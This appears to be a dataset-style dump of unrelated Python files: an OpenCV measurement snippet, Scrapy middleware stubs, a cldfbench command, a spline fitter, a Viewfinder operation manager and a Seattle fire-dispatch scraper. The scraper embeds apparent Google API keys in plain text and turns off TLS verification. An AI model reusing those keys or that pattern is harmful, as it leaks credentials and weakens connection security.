(255, 0, 255), 2)
cv2.line(orig, (int(tlblX), int(tlblY)), (int(trbrX), int(trbrY)),
(255, 0, 255), 2)
# compute the Euclidean distance between the midpoints
dA = dist.euclidean((tltrX, tltrY), (blbrX, blbrY))
dB = dist.euclidean((tlblX, tlblY), (trbrX, trbrY))
# if the pixels per metric has not been initialized, then
# compute it as the ratio of pixels to supplied metric
# (in this case, inches)
if pixelsPerMetric is None:
pixelsPerMetric = dB / args["width"]
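    # e.g. with illustrative numbers: a 0.955 in wide reference object spanning
    # 143.3 px gives roughly 150 px per inch; every later pixel distance is
    # divided by this ratio to convert it to inches.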
# compute the size of the object
dimA = dA / pixelsPerMetric
dimB = dB / pixelsPerMetric
# draw the object sizes on the image
cv2.putText(orig, "{:.1f}in".format(dimA),
(int(tltrX - 15), int(tltrY - 10)), cv2.FONT_HERSHEY_SIMPLEX,
0.65, fontColor, 2)
cv2.putText(orig, "{:.1f}in".format(dimB),
(int(trbrX + 10), int(trbrY)), cv2.FONT_HERSHEY_SIMPLEX,
0.65, fontColor, 2)
# show the output image
cv2.imshow("Image", orig)
cv2.waitKey(0)
| 34.355932 | 92 | 0.703749 |
4a1b64bdc55834f19c86767f5553910b801fe51d | 885 | py | Python | 3.3.9/project/middlewares/spider_middlewares.py | feel-easy/myspider | dcc65032015d7dbd8bea78f846fd3cac7638c332 | ["Apache-2.0"] | 1 | 2019-02-28T10:16:00.000Z | 2019-02-28T10:16:00.000Z | 3.3.9/project/middlewares/spider_middlewares.py | wasalen/myspider | dcc65032015d7dbd8bea78f846fd3cac7638c332 | ["Apache-2.0"] | null | null | null | 3.3.9/project/middlewares/spider_middlewares.py | wasalen/myspider | dcc65032015d7dbd8bea78f846fd3cac7638c332 | ["Apache-2.0"] | null | null | null |
# THE WINTER IS COMING! the old driver will be driving who was a man of the world!
# -*- coding: utf-8 -*-  python 3.6.7, created 2018-12-01 4:10 PM GMT+8
class TestSpiderMiddleware1(object):
def process_request(self, request, spider):
        '''Process the request headers, adding a default user-agent.'''
print("TestSpiderMiddleware1: process_request")
return request
def process_response(self, request, response, spider):
        '''Process the response data object.'''
print("TestSpiderMiddleware1: process_response")
return response
class TestSpiderMiddleware2(object):
def process_request(self, request, spider):
        '''Process the request headers, adding a default user-agent.'''
print("TestSpiderMiddleware2: process_request")
return request
def process_response(self, request, response, spider):
        '''Process the response data object.'''
print("TestSpiderMiddleware2: process_response")
return response
| 32.777778 | 82 | 0.676836 |
4a1b64c0e86378ae2ae8e0c9f9d9cf0a6f17c89b | 1,808 | py | Python | src/cldfbench/commands/catinfo.py | johenglisch/cldfbench | 59e868015beb0d86c5855f66d659866b322dcebc | ["Apache-2.0"] | 4 | 2019-10-16T07:45:09.000Z | 2021-12-27T22:10:07.000Z | src/cldfbench/commands/catinfo.py | johenglisch/cldfbench | 59e868015beb0d86c5855f66d659866b322dcebc | ["Apache-2.0"] | 63 | 2019-10-04T10:29:21.000Z | 2022-03-25T09:08:57.000Z | src/cldfbench/commands/catinfo.py | johenglisch/cldfbench | 59e868015beb0d86c5855f66d659866b322dcebc | ["Apache-2.0"] | 4 | 2019-11-26T10:29:27.000Z | 2021-02-10T08:34:49.000Z |
"""
Display information about catalogs in the system
"""
import termcolor
from cldfcatalog import Config
from cldfbench.cli_util import add_catalog_spec
from cldfbench.catalogs import BUILTIN_CATALOGS
from cldfbench.util import iter_aligned
def register(parser):
for cat in BUILTIN_CATALOGS:
add_catalog_spec(parser, cat.cli_name(), with_version=False)
parser.add_argument(
'--max-versions',
default=5,
help='Maximal number of versions to display',
type=int)
parser.set_defaults(no_catalogs=True)
def print_kv(k, v=''):
print('{0} {1}'.format(termcolor.colored('{0}:'.format(k), attrs=['bold']), v))
def run(args):
cfg = Config.from_file()
for cat in BUILTIN_CATALOGS:
name = cat.cli_name()
print()
print(termcolor.colored(
'{0} - https://github.com/{1}'.format(name, cat.__github__),
attrs=['bold', 'underline']))
print()
path, from_cfg = getattr(args, name), False
if (not path) and (not args.no_config):
try:
path, from_cfg = cfg.get_clone(name), True
except KeyError as e:
args.log.warning(str(e))
continue
try:
cat = cat(path)
except ValueError as e: # pragma: no cover
args.log.warning(str(e))
continue
print_kv('local clone', cat.dir.resolve())
if from_cfg:
print_kv('config at', cfg.fname())
print_kv('versions')
for i, version in enumerate(iter_aligned(cat.iter_versions(), prefix=' ')):
if i < args.max_versions:
print(version)
if cat.__api__:
print_kv('API', '{0.__name__} {0.__version__}'.format(cat.__api_pkg__))
print()
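# Illustrative invocation only (not part of the original module); assumes Glottolog is
# among the built-in catalogs and that a local clone exists:
#
#   cldfbench catinfo --glottolog ~/glottolog --max-versions 3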
| 28.698413 | 84 | 0.591814 |
4a1b664710de9b25fcf4cdb3f20562b4a119a272
| 3,612 |
py
|
Python
|
voltoolbox/fit/average_spline.py
|
quintron/vol-toolbox
|
0bddb66c0160da1fb9393c60f6a99600311bbcf9
|
[
"MIT"
] | null | null | null |
voltoolbox/fit/average_spline.py
|
quintron/vol-toolbox
|
0bddb66c0160da1fb9393c60f6a99600311bbcf9
|
[
"MIT"
] | null | null | null |
voltoolbox/fit/average_spline.py
|
quintron/vol-toolbox
|
0bddb66c0160da1fb9393c60f6a99600311bbcf9
|
[
"MIT"
] | 1 |
2020-08-18T17:56:09.000Z
|
2020-08-18T17:56:09.000Z
|
import numpy as np
import scipy.integrate as integrate
def avg(f, z):
if abs(z) < 1.0e-15:
return f(0.0)
x, _ = integrate.quad(f, 0.0, z)
return x / z
class AverageSpline(object):
def __init__(self, put_zs=None, call_zs=None):
self.put_zs = tuple(put_zs) if put_zs else tuple()
        self.call_zs = tuple(call_zs) if call_zs else tuple()
def put_wing(self, i, z):
assert(0 <= i < len(self.put_zs) - 1)
if i == 0:
a, b, c = (-self.put_zs[1], -self.put_zs[0], 0.0)
else:
a, b, c = (-self.put_zs[i+1], -self.put_zs[i], -self.put_zs[i-1])
res = (max(0, c - z)**3 - max(0, b - z)**3) / (c - b)
res -= (max(0, b - z)**3 -max(0, a - z)**3) / (b - a)
return res / 6.0
def call_wing(self, i, z):
assert(0 <= i < len(self.call_zs) - 1)
        if i == 0:
a, b, c = (0.0, self.call_zs[0], self.call_zs[1])
else:
a, b, c = (self.call_zs[i-1], self.call_zs[i], self.call_zs[i+1])
res = (max(0, z - a)**3 -max(0, z - b)**3) / (b - a)
res -= (max(0, z - b)**3 -max(0, z - c)**3) / (c - b)
return res / 6.0
def convex(self, z):
a, b, c = (-2.0, 0.0, 2.0)
res = (max(0, z - a)**3 - max(0, z - b)**3) / (b - a)
res -= (max(0, z - b)**3 - max(0, z - c)**3) / (c - b)
res -= (b - a)**2
res += (max(0, c - z)**3 - max(0, b - z)**3) / (c - b)
res -= (max(0, b - z)**3 - max(0, a - z)**3) / (b - a)
res -= (c-b)**2
return res / 12.0
def slope(self, z):
return z
def put_wing_avg(self, i, z):
return avg(lambda x: self.put_wing(i, x), z)
def call_wing_avg(self, i, z):
return avg(lambda x: self.call_wing(i, x), z)
def convex_avg(self, z):
return avg(self.convex, z)
def slope_avg(self, z):
return avg(self.slope, z)
def compute_avg_vals(self, xs):
vals = [np.array([1.0] * xs.shape[0]),
np.vectorize(self.slope_avg)(xs),
np.vectorize(self.convex_avg)(xs)]
for i in range(0, len(self.call_zs) - 1):
vals += [np.vectorize(lambda x: self.call_wing_avg(i, x))(xs)]
for i in range(0, len(self.put_zs) - 1):
vals += [np.vectorize(lambda x: self.put_wing_avg(i, x))(xs)]
return np.column_stack(vals)
def compute_vals(self, xs):
vals = [np.array([1.0] * xs.shape[0]),
np.vectorize(self.slope)(xs),
np.vectorize(self.convex)(xs)]
for i in range(0, len(self.call_zs) - 1):
vals += [np.vectorize(lambda x: self.call_wing(i, x))(xs)]
for i in range(0, len(self.put_zs) - 1):
vals += [np.vectorize(lambda x: self.put_wing(i, x))(xs)]
return np.column_stack(vals)
def fit_coeffs(self, xs, vals, errs=None, *, smoothing=1.0e-12):
if errs is None:
errs = np.array([1.0] * xs.shape[0])
basis_vals = self.compute_avg_vals(xs)
basis_vals /= np.column_stack([errs])
target = vals / errs
var = np.matmul(basis_vals.T, basis_vals)
var_regul = smoothing * var.trace() * np.identity(var.shape[0])
var_regul[0,0] = 0.0 # dont need to smooth level
var_regul[1,1] = 0.0 # dont need to smooth slope
var_regul[2,2] = 0.0 # dont need to smooth convexity
var += var_regul
cov = basis_vals.T.dot(target)
return np.linalg.solve(var, cov)
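# Minimal usage sketch (not part of the original module); the knot locations and target
# values below are made up for illustration:
#
#   xs = np.linspace(-2.0, 2.0, 21)
#   spline = AverageSpline(put_zs=(0.5, 1.0, 2.0), call_zs=(0.5, 1.0, 2.0))
#   coeffs = spline.fit_coeffs(xs, vals=np.ones_like(xs))
#   fitted = spline.compute_avg_vals(xs).dot(coeffs)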
| 34.730769 | 77 | 0.495293 |
4a1b66b5e34c4759f9d97bd84f874080504b6f5b
| 11,655 |
py
|
Python
|
backend/op/op_manager.py
|
sleepingAnt/viewfinder
|
9caf4e75faa8070d85f605c91d4cfb52c4674588
|
[
"Apache-2.0"
] | 645 |
2015-01-03T02:03:59.000Z
|
2021-12-03T08:43:16.000Z
|
backend/op/op_manager.py
|
hoowang/viewfinder
|
9caf4e75faa8070d85f605c91d4cfb52c4674588
|
[
"Apache-2.0"
] | null | null | null |
backend/op/op_manager.py
|
hoowang/viewfinder
|
9caf4e75faa8070d85f605c91d4cfb52c4674588
|
[
"Apache-2.0"
] | 222 |
2015-01-07T05:00:52.000Z
|
2021-12-06T09:54:26.000Z
|
# Copyright 2012 Viewfinder Inc. All Rights Reserved.
"""Viewfinder operation manager.
The operation manager tracks and executes operations submitted by user devices. The key goals
of the operation manager are:
- Provide restart functionality for incomplete operations
- Serialize operations coming from a single device
- Mutual exclusion between multiple processing servers (only one server may operate on a
user's operations at a time).
Restart functionality is achieved by writing each operation as JSON-encoded data to the
Operation table. Operations are given a unique id that is allocated by client devices, which
should be the order that the client would like them run by the server. Mutual exclusion is
assured by acquiring a per-user lock for operations submitted by a particular user. The
operation lock provides a server with exclusive access to operations for a user. With the lock,
the server processes each pending operation in order for a device (operations from multiple
devices may be interleaved). Another server receiving an operation for a locked user will
simply write the op to the database and continue. If a server with a lock crashes, then
operations for that user will stall for a maximum of the lock expiration time. Each server
periodically scans the lock table to pick up and resuscitate idle user operation queues which
were dropped or ignored (e.g. due to excessive load).
In cases where an operation hits transient problems (such as database unavailability) or bugs,
the operation will be retried by the manager. After a number of such retries, the operation
manager will eventually give up and put that operation into "quarantine", which means it will
be saved in the database for later developer inspection and repair. The quarantine state is
useful because without it, a failed operation would retain the operation lock and prevent all
future operations for that user from executing. This would result in total user lockout.
OpManager: one instance per server; processes user ops which have fallen through the cracks
"""
__authors__ = ['spencer@emailscrubbed.com (Spencer Kimball)',
'andy@emailscrubbed.com (Andy Kimball)']
import logging
import random
import time
from datetime import timedelta
from functools import partial
from tornado import gen, stack_context
from tornado.ioloop import IOLoop
from viewfinder.backend.base import message, util
from viewfinder.backend.db import db_client
from viewfinder.backend.db.lock import Lock
from viewfinder.backend.db.lock_resource_type import LockResourceType
class OpManager(object):
"""Submit new operations to the op manager via the "MaybeExecuteOp" method. The OpManager
class manages the set of all users that have submitted operations to this server. However,
the queue of operations is actually managed and executed by an instance of the UserOpManager
class.
Periodically scans the database for abandoned locks and failed operations. Each abandoned
lock is associated with user operations that have stalled and need to be restarted. Each
failed operation needs to be periodically retried in order to see if the underlying issue
has been fixed.
On startup, a random time offset is chosen before initiating the first scan. This is meant
to avoid multiple servers scanning the same data.
This class is meant to be a singleton for each instance of the server. Access the instance
via OpManager.Instance().
"""
_MAX_USERS_OUTSTANDING = 1000
"""Maximum number of users that can be under management for scans to take place."""
_SCAN_LIMIT = 10
"""Maximum number of abandoned locks and failed operations that will be returned from scans
(i.e. after filtering).
"""
_MAX_SCAN_ABANDONED_LOCKS_INTERVAL = timedelta(seconds=60)
"""Time between scans for abandoned locks."""
_MAX_SCAN_FAILED_OPS_INTERVAL = timedelta(hours=6)
"""Time between scans for failed operations to retry."""
def __init__(self, op_map, client=None, scan_ops=False):
"""Initializes the operation map, which is a dictionary mapping from operation method str
to an instance of OpMapEntry. Also initializes maps for active users (map from user id to
an instance of UserOpManager).
"""
self.op_map = op_map
self._client = client or db_client.Instance()
self._active_users = dict()
self._drain_callback = None
if scan_ops:
self._ScanAbandonedLocks()
self._ScanFailedOps()
def WaitForUserOps(self, client, user_id, callback):
"""Wait for all ops running on behalf of user_id to complete. WaitForOp behaves exactly
like using the "synchronous" option when submitting an operation. The callback will be
invoked once all operations are completed or they're backed off due to repeated failure.
"""
self.MaybeExecuteOp(client, user_id, None, callback)
def Drain(self, callback):
"""Invokes "callback" when there is no current work to be done.
To be used for cleanup in tests.
"""
if not self._active_users:
IOLoop.current().add_callback(callback)
else:
self._drain_callback = stack_context.wrap(callback)
def MaybeExecuteOp(self, client, user_id, operation_id, wait_callback=None):
"""Adds the op's user to the queue and attempts to begin processing the operation. If the
user is already locked by another server, or if this server is already executing operations
for this user, then the operation is merely queued for later execution.
If the "wait_callback" function is specified, then it is called once the operation has
completed execution (or an error has occurred). This is useful for testing. The callback
should have the form:
OnExecution(value=None, type=None, tb=None)
"""
from viewfinder.backend.op.user_op_manager import UserOpManager
user_op_mgr = self._active_users.get(user_id, None)
if user_op_mgr is None:
user_op_mgr = UserOpManager(client, self.op_map, user_id,
partial(self._OnCompletedOp, user_id))
self._active_users[user_id] = user_op_mgr
user_op_mgr.Execute(operation_id, wait_callback)
def _OnCompletedOp(self, user_id):
"""Removes the user from the list of active users, since all of that user's operations have
been executed.
"""
del self._active_users[user_id]
if not self._active_users and self._drain_callback:
IOLoop.current().add_callback(self._drain_callback)
self._drain_callback = None
@gen.engine
def _ScanFailedOps(self):
"""Periodically scans the Operation table for operations which have failed and are ready
to retry. If any are found, they are retried to see if the error that originally caused
them to fail has been fixed.
"""
from viewfinder.backend.db.operation import Operation
max_timeout_secs = OpManager._MAX_SCAN_FAILED_OPS_INTERVAL.total_seconds()
while True:
# If there are too many active users, do not scan.
if len(self._active_users) < self._MAX_USERS_OUTSTANDING:
try:
last_key = None
while True:
limit = min(self._MAX_USERS_OUTSTANDING - len(self._active_users), OpManager._SCAN_LIMIT)
ops, last_key = yield gen.Task(Operation.ScanFailed,
self._client,
limit=limit,
excl_start_key=last_key)
# Add each operation to the queue for the owning user.
for op in ops:
logging.info('scanned failed operation "%s" for user %d' % (op.operation_id, op.user_id))
if op.user_id not in self._active_users:
# Create a clean context for this operation since we're not blocking the current
# coroutine on it.
with stack_context.NullContext():
with util.ExceptionBarrier(util.LogExceptionCallback):
self.MaybeExecuteOp(self._client, op.user_id, op.operation_id)
# Keep iterating until all failed operations have been found, otherwise wait until the next scan time.
if last_key is None:
break
except Exception:
logging.exception('failed op scan failed')
# Wait until next scan time.
timeout_secs = random.random() * max_timeout_secs
timeout_time = time.time() + timeout_secs
logging.debug('next scan in %.2fs' % timeout_secs)
yield gen.Task(IOLoop.current().add_timeout, timeout_time)
@gen.engine
def _ScanAbandonedLocks(self):
"""Periodically scans the Locks table looking for abandoned operation
locks. If any are found, the associated operations are executed.
TODO(Andy): Scanning for abandoned locks really should go into a
LockManager class. See header for lock.py.
"""
max_timeout_secs = OpManager._MAX_SCAN_ABANDONED_LOCKS_INTERVAL.total_seconds()
while True:
# If there are too many active users, do not scan.
if len(self._active_users) < self._MAX_USERS_OUTSTANDING:
try:
last_key = None
while True:
limit = min(self._MAX_USERS_OUTSTANDING - len(self._active_users), OpManager._SCAN_LIMIT)
locks, last_key = yield gen.Task(Lock.ScanAbandoned,
self._client,
limit=limit,
excl_start_key=last_key)
for lock in locks:
resource_type, resource_id = Lock.DeconstructLockId(lock.lock_id)
if resource_type == LockResourceType.Operation:
user_id = int(resource_id)
logging.info('scanned operation lock for user %d' % user_id)
# Create a clean context for this operation since we're not blocking the current
# coroutine on it.
with stack_context.NullContext():
with util.ExceptionBarrier(util.LogExceptionCallback):
self.MaybeExecuteOp(self._client, user_id, lock.resource_data)
# Keep iterating until all abandoned locks have been found, otherwise wait until the next scan time.
if last_key is None:
break
except Exception:
logging.exception('abandoned lock scan failed')
# Wait until next scan time.
timeout_secs = random.random() * max_timeout_secs
timeout_time = time.time() + timeout_secs
logging.debug('next scan in %.2fs' % timeout_secs)
yield gen.Task(IOLoop.current().add_timeout, timeout_time)
@staticmethod
def SetInstance(op_manager):
"""Sets the per-process instance of the OpManager class."""
OpManager._instance = op_manager
@staticmethod
def Instance():
"""Gets the per-process instance of the OpManager class."""
assert hasattr(OpManager, '_instance'), 'instance not initialized'
return OpManager._instance
class OpMapEntry(object):
"""The OpManager constructor is supplied with the "operation map",
which is a dictionary mapping from operation method str to an
instance of this class. Each operation method is associated with
the following information:
handler: Method to invoke in order to execute the operation.
migrators: Message version migrators for the method args.
scrubber: Scrubs personal info from operation args before logging.
"""
def __init__(self, handler, migrators=[], scrubber=None):
self.handler = handler
self.migrators = sorted(message.REQUIRED_MIGRATORS + migrators)
self.scrubber = scrubber
| 45.705882 | 114 | 0.711111 |
4a1b67f2ccab7f6c325c67e849ab99eb03ffb635
| 8,146 |
py
|
Python
|
scripts/train.py
|
leezhp1994/TMHFS
|
4711c38aab7657313eea3697da5cb1e4122ae8c8
|
[
"Apache-2.0"
] | 7 |
2020-05-20T02:22:25.000Z
|
2021-03-26T08:51:51.000Z
|
scripts/train.py
|
leezhp1994/TMHFS
|
4711c38aab7657313eea3697da5cb1e4122ae8c8
|
[
"Apache-2.0"
] | null | null | null |
scripts/train.py
|
leezhp1994/TMHFS
|
4711c38aab7657313eea3697da5cb1e4122ae8c8
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
sys.path.append('../')
import argparse
import numpy as np
import torch
from utils.generator.generators_train import miniImageNetGenerator as train_loader
from utils.model import Runner
from utils import configs
def str2bool(v):
    if isinstance(v, bool):
        return v
    if v.lower() in ('yes', 'true', 't', 'y', '1'):
        return True
    elif v.lower() in ('no', 'false', 'f', 'n', '0'):
        return False
    else:
        raise argparse.ArgumentTypeError('Boolean value expected.')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--is_train', type=str2bool, default=True,
                        help='Choose train (True) or test (False).')
parser.add_argument('--n_folder', type=int, default=0,
help='Number of folder.')
parser.add_argument('--gpu', type=int, default=0,
help='GPU device number.')
parser.add_argument('--backbone', type=str, default='ResNet-12',
                        help='Choose a backbone such as ConvNet-64, ConvNet-128, ConvNet-256 or ResNet-12.')
parser.add_argument('--initial_lr', type=float, default=1e-1,
help='Initial learning rate.')
parser.add_argument('--first_decay', type=int, default=25000,
help='First decay step.')
parser.add_argument('--second_decay', type=int, default=35000,
help='Second decay step.')
parser.add_argument('--transductive', type=str2bool, default=True,
help='Whether to use transductive training or not.')
parser.add_argument('--flip', type=str2bool, default=True,
help='Whether to inject data uncertainty.')
parser.add_argument('--drop', type=str2bool, default=True,
help='Whether to inject model uncertainty.')
parser.add_argument('--n_shot', type=int, default=5,
help='Number of support set per class in train.')
parser.add_argument('--n_query', type=int, default=8,
help='Number of queries per class in train.')
parser.add_argument('--n_test_query', type=int, default=15,
help='Number of queries per class in test.')
parser.add_argument('--n_train_class', type=int, default=15,
help='Number of way for training episode.')
parser.add_argument('--n_test_class', type=int, default=5,
help='Number of way for test episode.')
parser.add_argument('--save', type=str, default='default',
                        help='Suffix used to build the save folder name.')
parser.add_argument('--test_data', type=str, default='ISIC',
help='Name of test dataset.')
parser.add_argument('--test_aug', type=int, default=0,
help='Number of data augmentation methods.')
args = parser.parse_args()
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = str(args.gpu)
#######################
folder_num = args.n_folder
# optimizer setting
max_iter = 50000
lrstep2 = args.second_decay
lrstep1 = args.first_decay
initial_lr = args.initial_lr
# train episode setting
n_shot=args.n_shot
n_query=args.n_query
nb_class_train = args.n_train_class
# test episode setting
n_query_test = args.n_test_query
nb_class_test=args.n_test_class
train_path = configs.imagenet_path
#save_path
save_path = 'save/baseline_' + str(args.save) + str(folder_num).zfill(3)
filename_5shot=save_path + '/miniImageNet_ResNet12'
filename_5shot_last= save_path + '/miniImageNet_ResNet12_last'
# set up training
# ------------------
model = Runner(nb_class_train=nb_class_train, nb_class_test=nb_class_test, input_size=3*84*84,
n_shot=n_shot, n_query=n_query, backbone=args.backbone,
transductive_train=args.transductive, flip=args.flip, drop=args.drop)
model.set_optimizer(learning_rate=initial_lr, weight_decay_rate=5e-4)
if not os.path.exists(save_path):
os.makedirs(save_path)
loss_h=[]
accuracy_h_val=[]
accuracy_h_test=[]
acc_best=0
epoch_best=0
# start training
# ----------------
if args.is_train:
train_generator = train_loader(data_file=train_path, nb_classes=nb_class_train,
nb_samples_per_class=n_shot + n_query, max_iter=max_iter)
for t, (images, labels) in train_generator:
# train
loss = model.train(images, labels)
# logging
loss_h.extend([loss.tolist()])
if (t % 100 == 0):
print("Episode: %d, Train Loss: %f "%(t, loss))
torch.save(model.model.state_dict(), filename_5shot_last)
if (t != 0) & (t % lrstep1 == 0):
for param_group in model.optimizer.param_groups:
param_group['lr'] *= 0.06
print('-------Decay Learning Rate to ', param_group['lr'], '------')
if (t != 0) & (t % lrstep2 == 0):
for param_group in model.optimizer.param_groups:
param_group['lr'] *= 0.2
print('-------Decay Learning Rate to ', param_group['lr'], '------')
accuracy_h5=[]
total_acc = []
checkpoint = torch.load(filename_5shot)
state_keys = list(checkpoint.keys())
for _, key in enumerate(state_keys):
if "classifier." in key:
checkpoint.pop(key)
# print(checkpoint.keys())
print('Evaluating the best {}-shot model for {}...'.format(n_shot,args.test_data))
test_data = args.test_data
aug_num = max(args.test_aug,1)
print('aug_num:',args.test_aug)
if 'cropdiseases' in test_data.lower():
save_name = 'CropDiseases'
test_path = configs.CropDisease_path
from utils.generator.generators_test import miniImageNetGenerator as test_loader
elif 'isic' in test_data.lower():
save_name = 'ISIC'
test_path = configs.ISIC_path
from utils.generator.generators_isic_test import miniImageNetGenerator as test_loader
elif 'eurosat' in test_data.lower():
save_name = 'EuroSAT'
test_path = configs.EuroSAT_path
from utils.generator.generators_eurosat_cropdiseases_test import miniImageNetGenerator as test_loader
elif 'chestx' in test_data.lower():
save_name = 'chestX'
test_path = configs.ChestX_path
from utils.generator.generators_chestX_test import miniImageNetGenerator as test_loader
else:
raise ValueError('Unknown test data')
for i in range(1):
test_generator = test_loader(data_file=test_path, nb_classes=nb_class_test,
nb_samples_per_class=n_shot+n_query_test, max_iter=600,aug_num=aug_num)
scores=[]
acc_all = []
prob_cls_list = []
prob_traductive_list = []
for j, (images, labels) in test_generator:
model.model.load_state_dict(checkpoint)
acc, prob, label, scores_cls, prob_cls = model.evaluate(images, labels)
# acc, prob, label = model.evaluate(images, labels)
score = acc.data.cpu().numpy()
scores.append(score)
print('Episode %3d : accuracy %4f'%(j, np.mean(score) * 100))
total_acc.append(np.mean(score) * 100)
# acc_all.append(scores_cls)
accuracy_t=100*np.mean(np.array(scores))
accuracy_h5.extend([accuracy_t.tolist()])
# print(('600 episodes with 15-query accuracy: {}-shot ={:.2f}%').format(n_shot, accuracy_t))
del(test_generator)
del(acc)
del(accuracy_t)
#
# acc_all = np.asarray(acc_all)
# acc_mean = np.mean(acc_all)
# acc_std = np.std(acc_all)
# print('Test Acc = %4.2f%% +- %4.2f%%' % ( acc_mean, 1.96 * acc_std / np.sqrt(600)))
stds = np.std(total_acc, axis=0)
ci95 = 1.96 * stds / np.sqrt(len(total_acc))
print(('Accuracy_test {}-shot ={:.2f}({:.2f})').format(n_shot, np.mean(accuracy_h5), ci95))
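# Example invocation (illustrative; dataset paths are taken from utils.configs):
#   python train.py --is_train True --gpu 0 --n_shot 5 --test_data ISIC --save demo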
| 41.350254 | 109 | 0.610115 |
4a1b69377cbe114d0ff86a93ac41f2645662116e
| 7,955 |
py
|
Python
|
src/scripts/retrive_sfd_data.py
|
seattlepublicrecords/revealseattle
|
727d6fcaed3abd3170f4941d249067c52e86bf96
|
[
"Apache-2.0"
] | null | null | null |
src/scripts/retrive_sfd_data.py
|
seattlepublicrecords/revealseattle
|
727d6fcaed3abd3170f4941d249067c52e86bf96
|
[
"Apache-2.0"
] | 5 |
2016-10-12T05:21:56.000Z
|
2016-10-12T10:26:10.000Z
|
src/scripts/retrive_sfd_data.py
|
seattlepublicrecords/revealseattle
|
727d6fcaed3abd3170f4941d249067c52e86bf96
|
[
"Apache-2.0"
] | null | null | null |
import sys, traceback
from bs4 import BeautifulSoup
import rethinkdb as r
import requests
import time
import geocoder
import datetime
from dateutil.parser import parse as dtparse
from pytz import timezone
r.connect( "localhost", 28015).repl()
la = timezone('America/Los_Angeles')
table = r.db("revealseattle").table("dispatch_log")
dbtable = r.db("revealseattle").table("dispatch_log")
dbtable.delete().run()
def get_todays_dispatches():
already_geocoded = []
existing_data = dict([(row['id'], row) for row in dbtable.run()])
addresses_and_coordinates = dbtable.pluck('address', 'coordinates').run()
addresses_to_coordinates = dict([(item['address'], item['coordinates']) for item in addresses_and_coordinates if item.get('coordinates')])
addresses_and_place_names = dbtable.pluck('address', 'place_name').run()
addresses_to_place_names = dict([(item['address'], item['place_name']) for item in addresses_and_place_names if item.get('place_name', '').strip()])
addresses_and_assessor_ids = dbtable.pluck('address', 'assessor_id').run()
    addresses_to_assessor_ids = dict([(item['address'], item['assessor_id']) for item in addresses_and_assessor_ids if item.get('assessor_id', '').strip()])
html = requests.get('http://www2.seattle.gov/fire/realtime911/getRecsForDatePub.asp?action=Today&incDate=&rad1=des').text
soup = BeautifulSoup(html, 'lxml')
data = []
table = soup.findAll('tr')[3].find('table').find('table')
rows = table.find_all('tr')
# http://www2.seattle.gov/fire/realtime911/getRecsForDatePub.asp?incDate=09%2F24%2F16&rad1=des
previous_day = datetime.date.today()-datetime.timedelta(1)
previous_day = previous_day.strftime('%m%%2F%d%%2F%y')
html = requests.get('http://www2.seattle.gov/fire/realtime911/getRecsForDatePub.asp?incDate=%s&rad1=des' % (previous_day)).text
soup = BeautifulSoup(html, 'lxml')
data = []
table = soup.findAll('tr')[3].find('table').find('table')
rows.extend(table.find_all('tr'))
for row in rows:
cols = list(row.findAll('td'))
incident_id = cols[1].getText()
db_id = 'SFD_'+incident_id
existing_data_for_row = existing_data.get(db_id, {})
is_active = 'class="active"' in str(cols[0])
if is_active:
org_address = cols[4].getText()
address = org_address + ', Seattle'
address = address.replace('/', '&')
incident = {'id': db_id, 'agency': 'SFD', 'incident_id': incident_id, 'address': address, 'is_active': is_active, 'unit_timestamps': get_unit_dispatches_for_incident(incident_id)}
incident["number_of_units_dispatched"] = len(set([row['unit'] for row in incident["unit_timestamps"]]))
incident["number_of_units_in_service"] = len([row['in_service'] for row in incident["unit_timestamps"] if row['in_service']])
incident["org_address"] = org_address
incident["datetime"] = la.localize(dtparse(cols[0].getText()))
incident["type"] = cols[5].getText()
incident["streetview_url"] = 'https://maps.googleapis.com/maps/api/streetview?size=100x100&key=AIzaSyB59q3rCxkjqo3K2utcIh0_ju_-URL-L6g&location='+incident['address']
coordinates = addresses_to_coordinates.get(address)
if coordinates:
incident["coordinates"] = coordinates
else:
coordinates = geocoder.google(address, key='AIzaSyBE-WvY5WPBccBxW-97ZSBCBYEF80NBe7U').latlng
print coordinates
incident["coordinates"] = coordinates
place_name = addresses_to_place_names.get(address)
if place_name:
incident["place_name"] = place_name
else:
url = 'https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=%s,%s&radius=30.48&key=AIzaSyBE-WvY5WPBccBxW-97ZSBCBYEF80NBe7U' % (incident["coordinates"][0], incident["coordinates"][1])
print url
place_name = '; '.join([row.get('name', ' ') for row in requests.get(url).json()['results'][1:]])
incident["place_name"] = place_name
assessor_id = addresses_to_assessor_ids.get(address)
if assessor_id:
incident["assessor_id"] = assessor_id
incident["assessor_image_url"] = existing_data_for_row.get('assessor_image_url')
else:
url = 'http://gismaps.kingcounty.gov/parcelviewer2/addSearchHandler.ashx?add='+address
items = requests.get(url).json()['items']
incident["assessor_id"] = items[0].get('PIN', None) if items else None
url_beginning = 'http://blue.kingcounty.com/Assessor/eRealProperty/Dashboard.aspx?ParcelNbr='
if incident["assessor_id"]:
url = '%s%s' % (url_beginning, incident["assessor_id"])
print 'ASSESSOR url', url
assessor_html = requests.get(url).text
#print assessor_html
html_id = 'kingcounty_gov_cphContent_FormViewPictCurr_CurrentImage'
image_url_beginning = 'http://blue.kingcounty.com/Assessor/eRealProperty/'
assessor_soup = BeautifulSoup(assessor_html, 'lxml')
image_url_end = assessor_soup.find(id=html_id)['src']
image_url = '%s%s' % (image_url_beginning, image_url_end)
else:
image_url = ''
incident["assessor_image_url"] = image_url
address_history = existing_data_for_row.get('address_history')
if address_history:
incident["address_history"] = address_history
else:
url = 'https://data.seattle.gov/resource/grwu-wqtk.json?$order=datetime DESC&address='+org_address
print url
incident["address_history"] = requests.get(url, verify=False).json()
data.append(incident)
else:
# was it previously active in last loop?
try:
if dbtable.get('SFD_'+incident_id).run()['is_active']:
dbtable.get('SFD_'+incident_id).update({"is_active": False, "unit_timestamps": get_unit_dispatches_for_incident(incident_id)}).run()
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "*** print_tb:"
traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)
print "*** print_exception:"
traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=2, file=sys.stdout)
return data
def get_unit_dispatches_for_incident(incident_id):
incident_html = requests.get('http://www2.seattle.gov/fire/IncidentSearch/incidentDetail.asp?ID='+incident_id).text
incident_soup = BeautifulSoup(incident_html, 'lxml')
table = incident_soup.findAll('tr')[3].find('table').find('table')
rows = table.find_all('tr')
